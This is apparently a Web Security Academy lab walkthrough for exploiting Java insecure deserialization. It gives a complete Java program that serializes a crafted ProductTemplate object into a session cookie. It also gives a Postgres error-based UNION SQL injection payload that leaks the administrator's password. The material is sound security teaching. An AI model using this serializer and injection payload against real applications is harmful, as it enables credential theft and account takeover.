Lab: Developing a custom gadget chain for Java deserialization
This lab uses a serialization-based session mechanism. If you can construct a suitable gadget chain, you can exploit this lab's insecure deserialization to obtain the administrator's password.
To solve the lab, gain access to the source code and use it to construct a gadget chain to obtain the administrator's password. Then, log in as the administrator and delete Carlos's account.
You can log in to your own account using the following credentials:
Note that solving this lab requires basic familiarity with another topic that we've covered on the Web Security Academy.
To save you some of the effort, we've provided a generic Java program for serializing objects. You can adapt this to generate a suitable object for your exploit. If you don't already have a Java environment set up, you can compile and execute the program using a browser-based IDE, such as
- Log in to your own account and notice the session cookie contains a serialized Java object.
- From the site map, notice that the website references the file `/backup/AccessTokenUser.java`. You can successfully request this file in Burp Repeater.
- Browse upward to the `/backup` directory and notice that it also contains the source of the `ProductTemplate` class. Notice that the `ProductTemplate.readObject()` method concatenates the template's `id` attribute into a SQL statement, which is executed as a side effect of deserializing the object.
- Based on the leaked source code, write a small Java program that instantiates a `ProductTemplate` with an arbitrary `id`, serializes it, and then Base64-encodes it. In case you get stuck, we've also provided a ready-to-use program that you can use instead - all you need to change is the `"your-payload-here"` string.
- Use your Java program to create a `ProductTemplate` with its `id` set to a single apostrophe. Copy the Base64 string and submit it in a request as your session cookie. The error message confirms that the website is vulnerable to Postgres-based SQL injection via this deserialized object.
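The following is an added example of such a serializer, written for this write-up; it is not the ready-to-use program that PortSwigger ships with the lab. The package declaration and the `serialVersionUID` value are placeholders: copy both from the leaked `ProductTemplate` source, because the server resolves the class by its fully qualified name and rejects the stream with `java.io.InvalidClassException` if the UID differs. The server-side `readObject()` does not need to be reproduced here; it runs on the server when the cookie is deserialized.

```java
package data.productcatalog; // ASSUMPTION: replace with the package declared in the leaked ProductTemplate source

import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.util.Base64;

// Client-side stand-in for the server's ProductTemplate. Only the stream identity
// matters: package + class name, serialVersionUID and the serializable field(s).
public class ProductTemplate implements Serializable {
    // ASSUMPTION: placeholder; copy the real value from the leaked source.
    private static final long serialVersionUID = 1L;

    // The field that readObject() on the server concatenates into its SQL statement.
    private final String id;

    public ProductTemplate(String id) {
        this.id = id;
    }

    public String getId() {
        return id;
    }

    // Serialize any Serializable object with the standard JDK stream format and
    // Base64-encode it, which is the shape the session cookie uses.
    public static String serializeToBase64(Serializable obj) throws IOException {
        ByteArrayOutputStream bytes = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(bytes)) {
            out.writeObject(obj);
        }
        return Base64.getEncoder().encodeToString(bytes.toByteArray());
    }

    // Usage: javac -d out ProductTemplate.java
    //        java -cp out data.productcatalog.ProductTemplate "<payload>"
    // With no argument the payload is a single apostrophe, the probe that
    // surfaces the SQL error described above.
    public static void main(String[] args) throws IOException {
        String payload = args.length > 0 ? args[0] : "'";
        System.out.println(serializeToBase64(new ProductTemplate(payload)));
    }
}
```

Two practical points. First, the `id` value is stored in the stream as a length-prefixed string (a `TC_STRING` tag followed by a two-byte big-endian length and the modified UTF-8 bytes), so changing the payload changes that length field as well; editing the decoded bytes by hand without updating the prefix produces a stream the server cannot parse, which is why each new payload is regenerated with the program rather than patched in place. Second, if the application URL-decodes the cookie value, URL-encode the `+`, `/` and `=` characters of the Base64 output before pasting it into the request.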
Having identified this vulnerability, there are multiple techniques you can use to extract the password. For this example solution, we'll use an error-based attack.
At this point, you have the following options for working with your payload:
  - Make changes to the `id` attribute in your Java file, recompile it, and paste the new value into your session cookie manually.
  - Alternatively, use the Hackvertor extension. If you use Hackvertor, you can paste the raw serialized object into Burp Repeater, and then add Hackvertor tags that recompute the offsets (the length prefixes inside the stream) automatically. You can then make changes to the payload directly in Burp Repeater.
If you've not used Hackvertor before, you can use the following template. We've Base64-encoded it to avoid copy & paste issues. You will need to paste it into your session cookie in Burp Repeater, then Base64-decode it. You can then modify `add-your-payload-here` to be whatever payload you want. You don't need to change anything else - any adjustments to the offsets and encoding will be handled automatically by Hackvertor.
- Make changes to the `id` attribute to construct a basic `UNION` attack on the `users` table. Enumerate the number of columns (8) and observe that columns 4, 5, and 6 do not expect a string. Probe the `users` table using standard SQL injection techniques.
- Use a suitable payload to extract the password. The error-based trick is to place `cast(password as numeric)` in one of the columns that expects a number (column 4 here): the `UNION` is then type-compatible, but the cast fails at runtime on the non-numeric password value, and Postgres includes the offending value in its error message. For example, the following `id` payload displays the password in the error message:

```sql
' UNION SELECT NULL, NULL, NULL, cast(password as numeric), NULL, NULL, NULL, NULL FROM users--
```
- To solve the lab, log in using the extracted password, open the admin panel, and delete Carlos's account.